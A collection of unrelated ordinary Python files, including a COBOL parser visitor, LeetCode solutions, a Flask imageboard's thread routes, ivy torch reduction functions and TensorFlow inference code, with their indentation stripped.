# Visit a parse tree produced by Cobol85Parser#powers.
def visitPowers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#power.
def visitPower(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#basis.
def visitBasis(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#condition.
def visitCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#andOrCondition.
def visitAndOrCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#combinableCondition.
def visitCombinableCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#simpleCondition.
def visitSimpleCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classCondition.
def visitClassCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionNameReference.
def visitConditionNameReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionNameSubscriptReference.
def visitConditionNameSubscriptReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCondition.
def visitRelationCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationSignCondition.
def visitRelationSignCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationArithmeticComparison.
def visitRelationArithmeticComparison(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCombinedComparison.
def visitRelationCombinedComparison(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCombinedCondition.
def visitRelationCombinedCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationalOperator.
def visitRelationalOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#abbreviation.
def visitAbbreviation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identifier.
def visitIdentifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#tableCall.
def visitTableCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#functionCall.
def visitFunctionCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#referenceModifier.
def visitReferenceModifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#characterPosition.
def visitCharacterPosition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#length.
def visitLength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subscript.
def visitSubscript(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#argument.
def visitArgument(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataName.
def visitQualifiedDataName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat1.
def visitQualifiedDataNameFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat2.
def visitQualifiedDataNameFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat3.
def visitQualifiedDataNameFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat4.
def visitQualifiedDataNameFormat4(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedInData.
def visitQualifiedInData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inData.
def visitInData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inFile.
def visitInFile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inMnemonic.
def visitInMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inSection.
def visitInSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inLibrary.
def visitInLibrary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inTable.
def visitInTable(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetName.
def visitAlphabetName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#assignmentName.
def visitAssignmentName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#basisName.
def visitBasisName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cdName.
def visitCdName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#className.
def visitClassName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computerName.
def visitComputerName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionName.
def visitConditionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataName.
def visitDataName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescName.
def visitDataDescName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentName.
def visitEnvironmentName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileName.
def visitFileName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#functionName.
def visitFunctionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#indexName.
def visitIndexName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#languageName.
def visitLanguageName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryName.
def visitLibraryName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#localName.
def visitLocalName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mnemonicName.
def visitMnemonicName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraphName.
def visitParagraphName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureName.
def visitProcedureName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programName.
def visitProgramName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordName.
def visitRecordName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportName.
def visitReportName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#routineName.
def visitRoutineName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenName.
def visitScreenName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sectionName.
def visitSectionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#systemName.
def visitSystemName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharacter.
def visitSymbolicCharacter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#textName.
def visitTextName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cobolWord.
def visitCobolWord(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#booleanLiteral.
def visitBooleanLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#numericLiteral.
def visitNumericLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#integerLiteral.
def visitIntegerLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cicsDfhRespLiteral.
def visitCicsDfhRespLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cicsDfhValueLiteral.
def visitCicsDfhValueLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#figurativeConstant.
def visitFigurativeConstant(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialRegister.
def visitSpecialRegister(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#commentEntry.
def visitCommentEntry(self, ctx):
return self.visitChildren(ctx)
|
from collections import deque
# Definition for a Node.
class Node:
def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):
self.val = val
self.left = left
self.right = right
self.next = next
class Solution:
def BFS(self, root):
q = deque()
q.append(root)
while q:
length = len(q)
for i in range(length):
node = q.popleft()
node.next = q[0] if i != length - 1 else None
if node.left is not None:
q.append(node.left)
if node.right is not None:
q.append(node.right)
def DFS(self, node):
if node is None:
return
if node.left is not None: # node has two children
node.left.next = node.right # link left child
node.right.next = node.next.left if node.next is not None else None # link right child
self.DFS(node.left)
self.DFS(node.right)
def connect(self, root: 'Node') -> 'Node':
if root is None:
# raise Exception("Empty Tree")
return None
# self.BFS(root)
self.DFS(root)
return root
|
import asyncio
from channels.db import database_sync_to_async
from students.models import Student
from students.utilities.starters import student_sync
from syncing.models import Signup
from syncing.utilities.status_codes import SignupStatusCodes
async def gather_with_concurrency(tasks, limit=32):
semaphore = asyncio.Semaphore(limit)
async def sem_task(task):
async with semaphore:
return await task
return await asyncio.gather(*(sem_task(task) for task in tasks))
@database_sync_to_async
def get_all_students() -> list:
return list(Student.objects.all().values("roll_number", "std_pass"))
@database_sync_to_async
def create_signup_for_student(roll_number, semester_list):
user = Student.objects.get(roll_number=roll_number)
signup_obj = Signup.objects.create(
student=user,
logs=SignupStatusCodes.NOT_YET_STARTED.value,
attendance_pending=semester_list,
result_pending=semester_list,
)
return signup_obj
async def sequence_starter(message):
students = await get_all_students()
tasks = []
for student in students:
tasks.append(
asyncio.create_task(
student_sync(
roll_number=student["roll_number"],
password=student["std_pass"],
isSyncing=True,
message=message,
)
)
)
res = await gather_with_concurrency(tasks)
att_res_coroutines = [j for sub in res for j in sub]
await gather_with_concurrency(att_res_coroutines, limit=24)
message("Process Completed", "success")
async def admin_sync(roll_number, semester_list, message):
signup = await create_signup_for_student(roll_number, semester_list)
res = await student_sync(
roll_number=signup.student.roll_number,
password=signup.student.std_pass,
isSyncing=False,
message=message,
)
await gather_with_concurrency(res)
message("Process Completed", "success")
|
from collections import OrderedDict
from ananta.exports import BaseExport
class ContactExport(BaseExport):
def export_data(self):
export_data = OrderedDict((
("Record ID", {'type': 'result', 'value': 'pk'}),
("First Name", {'type': 'result', 'value': 'first_name'}),
("Middle Name", {'type': 'result', 'value': 'middle_name'}),
("Last Name", {'type': 'result', 'value': 'last_name'}),
("Initiated Name", {'type': 'result', 'value': 'initiated_name'}),
("Email", {'type': 'result', 'value': 'email'}),
("Phone Number", {'type': 'result', 'value': 'phone_number'}),
("Address", {'type': 'result', 'value': 'address'}),
("City", {'type': 'result', 'value': 'city'}),
("ZIP code", {'type': 'result', 'value': 'postcode'}),
("State", {'type': 'result', 'value': 'state'}),
("Country", {'type': 'result', 'value': 'country'}),
("Yatra", {'type': 'result', 'value': 'yatra'}),
("Total Balance [USD]", {'type': 'result', 'value': 'balance_total_usd'}),
("Year Balance [USD]", {'type': 'result', 'value': 'balance_year_usd'}),
("Fin. Year Bal. [USD]", {'type': 'result', 'value': 'balance_financial_year_usd'}),
("Total Balance [INR]", {'type': 'result', 'value': 'balance_total_inr'}),
("Year Balance [INR]", {'type': 'result', 'value': 'balance_year_inr'}),
("Fin. Year Bal. [INR]", {'type': 'result', 'value': 'balance_financial_year_inr'}),
("Sources", {'type': 'result', 'value': 'sources'}),
("Promotions", {'type': 'result', 'value': 'promotions'}),
))
return export_data
|
# global
torch_scatter = None
import torch as torch
from typing import Tuple, Union, Optional
# local
import ivy
# Array API Standard #
# -------------------#
# noinspection PyShadowingBuiltins
def min(
x: torch.Tensor,
axis: Union[int, Tuple[int]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
if not keepdims and not axis and axis != 0:
return torch.amin(input=x, out=out)
return torch.amin(input=x, dim=axis, keepdim=keepdims, out=out)
def sum(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
dtype: Optional[Union[ivy.Dtype, torch.dtype]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if dtype is None:
if x.dtype in [torch.int8, torch.int16]:
dtype = torch.int32
elif x.dtype == torch.uint8:
dtype = torch.uint8
elif x.dtype in [torch.int32, torch.int64]:
dtype = torch.int64
if axis is None:
return torch.sum(input=x, dtype=dtype, out=out)
elif type(axis) == list:
return torch.sum(input=x, dim=axis, out=out)
elif type(axis) == tuple:
if len(axis) == 0:
axis = 0
else:
return torch.sum(
torch.Tensor(
[
torch.sum(input=x, dim=i, dtype=dtype, keepdim=keepdims)
for i in axis
]
),
dtype=dtype,
out=out,
)
return torch.sum(input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out)
def prod(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
*,
dtype: torch.dtype,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if dtype is None:
if x.dtype in [torch.int8, torch.int16]:
dtype = torch.int32
elif x.dtype == torch.uint8:
dtype = torch.uint8
elif x.dtype in [torch.int64, torch.int32]:
dtype = torch.int64
elif x.dtype == torch.bfloat16:
dtype = torch.float16
if axis is None:
axis = x.dim() - 1
elif type(axis) == tuple:
if len(axis) == 0:
axis = x.dim() - 1
else:
return torch.prod(
torch.Tensor(
[
torch.prod(input=x, dim=i, dtype=dtype, keepdim=keepdims)
for i in axis
]
),
dtype=dtype,
out=out,
)
return torch.prod(input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out)
def mean(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int, ...]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
return torch.mean(x, dim=axis, keepdim=keepdims, out=out)
# noinspection PyShadowingBuiltins
def max(
x: torch.Tensor,
axis: Union[int, Tuple[int]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
if not keepdims and not axis and axis != 0:
return torch.amax(input=x, out=out)
return torch.amax(input=x, dim=axis, keepdim=keepdims, out=out)
def var(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
correction: Union[int, float] = 0.0,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = tuple(range(num_dims))
if isinstance(axis, int):
return torch.var(x, dim=axis, keepdim=keepdims, unbiased=False, out=out)
dims = len(x.shape)
axis = tuple([i % dims for i in axis])
for i, a in enumerate(axis):
if i == len(axis) - 1:
x = torch.var(
x,
dim=a if keepdims else a - i,
keepdim=keepdims,
unbiased=False,
out=out,
)
else:
x = torch.var(
x, dim=a if keepdims else a - i, keepdim=keepdims, unbiased=False
)
return x
def std(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
correction: Union[int, float] = 0.0,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = tuple(range(num_dims))
if isinstance(axis, int):
return torch.std(x, dim=axis, keepdim=keepdims, unbiased=False, out=out)
dims = len(x.shape)
axis = tuple([i % dims for i in axis])
for i, a in enumerate(axis):
if i == len(axis) - 1:
x = torch.std(
x,
dim=a if keepdims else a - i,
keepdim=keepdims,
unbiased=False,
out=out,
)
else:
x = torch.std(
x, dim=a if keepdims else a - i, keepdim=keepdims, unbiased=False
)
return x
# Extra #
# ------#
def einsum(equation: str, *operands: torch.Tensor) -> torch.Tensor:
return torch.einsum(equation, *operands)
|
class Solution:
"""
@param n: the integer to be reversed
@return: the reversed integer
"""
def reverseInteger(self, n):
isNeg = n < 0
if isNeg:
n = -n
res = int(str(n)[::-1])
if res >= 2 ** 32:
return 0
if isNeg:
return res * -1
return res
|
import dateutil.parser
from six import text_type
class Message(object):
def __init__(self, data, user=None):
self._data = data
self.sent = dateutil.parser.parse(data['sent_date'])
self.body = data['message']
if user:
if data['from'] == user.id:
self.sender = user
if data['to'] == user.id:
self.to = user
if data['from'] == user._session.profile.id:
self.sender = user._session.profile
if data['to'] == user._session.profile.id:
self.to = user._session.profile
def __unicode__(self):
return self.body
def __str__(self):
return text_type(self).encode("utf8")
def __repr__(self):
return repr(self.body)
|
import time
from flask import Blueprint, render_template, redirect, url_for, flash, request, copy_current_request_context, session, make_response
from werkzeug.http import parse_etags
import cache
import captchouli
import cooldown
from model.Media import upload_size, storage
from model.Board import Board
from model.NewPost import NewPost
from model.NewThread import NewThread
from model.Post import Post, render_for_threads
from model.PostRemoval import PostRemoval
from model.PostReplyPattern import url_for_post
from model.Poster import Poster
from model.Slip import get_slip, get_slip_bitmask
from model.SubmissionError import SubmissionError
from model.Thread import Thread
from model.ThreadPosts import ThreadPosts
from post import InvalidMimeError, CaptchaError
import renderer
from shared import db, app
from thread import invalidate_board_cache
threads_blueprint = Blueprint('threads', __name__, template_folder='template')
threads_blueprint.add_app_template_global(url_for_post)
@app.context_processor
def get_captchouli():
def _get_captchouli():
return captchouli.request_captcha()
return dict(get_captchouli=_get_captchouli)
@threads_blueprint.route("/new/<int:board_id>")
def new(board_id):
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
return renderer.render_new_thread_form(board_id, extra_data)
@threads_blueprint.route("/new", methods=["POST"])
def submit():
try:
thread = NewThread().post()
return redirect(url_for("threads.view", thread_id=thread.id))
except SubmissionError as e:
flash(str(e.args[0]))
return redirect(url_for("threads.new", board_id=e.args[1]))
except InvalidMimeError as e:
flash("Can't post attachment with MIME type \"%s\" on this board!" % e.args[0])
return redirect(url_for("threads.new", board_id=e.args[1]))
except CaptchaError as e:
flash("CAPTCHA error: %s" % e.args[0])
return redirect(url_for("threads.new", board_id=e.args[1]))
@threads_blueprint.route("/<int:thread_id>")
def view(thread_id):
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
thread.views += 1
db.session.add(thread)
db.session.commit()
current_theme = session.get("theme") or app.config.get("DEFAULT_THEME") or "stock"
response_cache_key = "thread-%d-%d-%s-render" % (thread_id, get_slip_bitmask(), current_theme)
cache_connection = cache.Cache()
view_key = "thread-%d-views" % thread_id
cached_views = cache_connection.get(view_key)
fetch_from_cache = True
if cached_views is None:
fetch_from_cache = False
else:
cached_views = int(cached_views)
if fetch_from_cache and (thread.views / cached_views) >= app.config.get("CACHE_VIEW_RATIO", 0):
fetch_from_cache = False
etag_value = "%s-%f" % (response_cache_key, time.time())
etag_cache_key = "%s-etag" % response_cache_key
if fetch_from_cache:
etag_header = request.headers.get("If-None-Match")
current_etag = cache_connection.get(etag_cache_key)
if etag_header:
parsed_etag = parse_etags(etag_header)
if parsed_etag.contains_weak(current_etag):
return make_response("", 304)
cache_response_body = cache_connection.get(response_cache_key)
if cache_response_body is not None:
cached_response = make_response(cache_response_body)
cached_response.set_etag(current_etag, weak=True)
cached_response.headers["Cache-Control"] = "public,must-revalidate"
return cached_response
posts = ThreadPosts().retrieve(thread_id)
render_for_threads(posts)
board = db.session.query(Board).get(thread.board)
num_posters = db.session.query(Poster).filter(Poster.thread == thread_id).count()
num_media = thread.num_media()
reply_urls = _get_reply_urls(posts)
thread_data = {}
for post in posts:
post["datetime"] = post["datetime"].strftime("%a, %d %b %Y %H:%M:%S UTC")
if post["media"]:
post["media_url"] = storage.get_media_url(post["media"], post["media_ext"])
post["thumb_url"] = storage.get_thumb_url(post["media"])
thread_data["posts"] = posts
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
template = renderer.render_thread(thread_data, thread_id, extra_data)
uncached_response = make_response(template)
uncached_response.set_etag(etag_value, weak=True)
uncached_response.headers["Cache-Control"] = "public,must-revalidate"
cache_connection.set(view_key, str(thread.views))
cache_connection.set(response_cache_key, template)
cache_connection.set(etag_cache_key, etag_value)
return uncached_response
@threads_blueprint.route("/<int:thread_id>/delete")
def delete(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can delete threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
board_id = thread.board
ThreadPosts().delete(thread_id)
invalidate_board_cache(board_id)
flash("Thread deleted!")
return redirect(url_for("boards.catalog", board_id=board_id))
@threads_blueprint.route("/<int:thread_id>/move")
def move(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can move threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
return render_template("thread-move.html", thread_id=thread_id)
@threads_blueprint.route("/<int:thread_id>/move", methods=["POST"])
def move_submit(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can move threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
thread = Thread.query.get(thread_id)
old_board = thread.board
new_board = Board.query.filter(Board.name == request.form["board"]).one()
thread.board = new_board.id
db.session.add(thread)
db.session.commit()
invalidate_board_cache(old_board)
invalidate_board_cache(new_board)
flash("Thread moved!")
return redirect(url_for("threads.view", thread_id=thread_id))
@threads_blueprint.route("/<int:thread_id>/new")
def new_post(thread_id):
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
return renderer.render_new_post_form(thread_id, extra_data)
@threads_blueprint.route("/<int:thread_id>/new", methods=["POST"])
def post_submit(thread_id):
try:
NewPost().post(thread_id)
except InvalidMimeError as e:
flash("Can't post attachment with MIME type \"%s\" on this board!" % e.args[0])
return redirect(url_for("threads.new_post", thread_id=thread_id))
except CaptchaError as e:
flash("CAPTCHA error: %s" % e.args[0])
return redirect(url_for("threads.new_post", thread_id=thread_id))
return redirect(url_for("threads.view", thread_id=thread_id) + "#thread-bottom")
@threads_blueprint.route("/post/<int:post_id>/delete")
def delete_post(post_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can delete posts!")
return redirect(url_for_post(post_id))
thread = db.session.query(Thread).filter(Thread.posts.any(Post.id == post_id)).one()
thread_id = thread.id
PostRemoval().delete(post_id)
flash("Post deleted!")
return redirect(url_for("threads.view", thread_id=thread_id))
@threads_blueprint.route("/post/<int:post_id>")
def render_post(post_id):
raw_post = db.session.query(Post).get(post_id)
thread_id = raw_post.thread
thread = db.session.query(Thread).get(thread_id)
dummy_array = ThreadPosts()._json_friendly([raw_post], thread)
render_for_threads(dummy_array)
post = dummy_array[0]
reply_urls = _get_reply_urls([post])
# TODO: properly set is_op, will be False most times, so set to that for now
is_op = False
return render_template("post-view-single.html", post=post, thread_id=thread_id, is_op=is_op, reply_urls=reply_urls)
@threads_blueprint.route("/<int:thread_id>/gallery")
def view_gallery(thread_id):
posts = ThreadPosts().retrieve(thread_id)
for post in posts:
# TODO: either streamline what gets sent to the frontend
# or automatically serialize datetimes so the below isn't necessary
del post["datetime"]
post["thumb_url"] = storage.get_thumb_url(post["media"])
post["media_url"] = storage.get_media_url(post["media"], post["media_ext"])
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
board = db.session.query(Board).get(thread.board)
return renderer.render_thread_gallery(board, thread_id, posts)
def _get_reply_urls(posts):
reply_ids = set()
for post in posts:
for reply in post["replies"]:
reply_ids.add(reply)
reply_urls = dict(map(lambda i: (i, url_for_post(i)), reply_ids))
return reply_urls
|
import tensorflow as tf
import numpy as np
FLAGS = tf.app.flags.FLAGS
def create_graph(model_file=None):
if not model_file:
model_file = FLAGS.model_file
#
with open(model_file, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
#
#
# 文件地址
image_path = "c:/Users/vvpen/Desktop/素材/dog.png"
model_file = "d:/temp/ai\pb/frozen_graph.pb"
# 初始化模型
create_graph(model_file)
with tf.Session() as sess:
# 读取图片文件
image_data = open(image_path, 'rb').read()
# 读取输入进来的图片,并进行解码
imgIn = tf.placeholder(name="input", dtype=tf.string)
image = tf.image.decode_jpeg(imgIn, channels=3)
# 增加一个维度
image = tf.expand_dims(image, 0)
# 获取图片矩阵 1 * 32 * 32 * 3
image_v = sess.run(image, feed_dict={imgIn: image_data})
print(image_v.shape)
print(type(image_v))
# 拿到图片矩阵数据后,直接调用模型
softmax_tensor = sess.graph.get_tensor_by_name("CifarNet/Predictions/Softmax:0")
perdictions = sess.run(softmax_tensor, {"input:0": image_v})
# perdictions = sess.run(softmax_tensor, {"CifarNet:0": image_v})
perdictions = np.squeeze(perdictions)
print(perdictions)
print(np.argmax(perdictions))
#
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import factory
from django.utils.lorem_ipsum import words
from .models import Article
class ArticleFactory(factory.django.DjangoModelFactory):
class Meta:
model = Article
@factory.lazy_attribute
def title(self):
return words(5, common=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.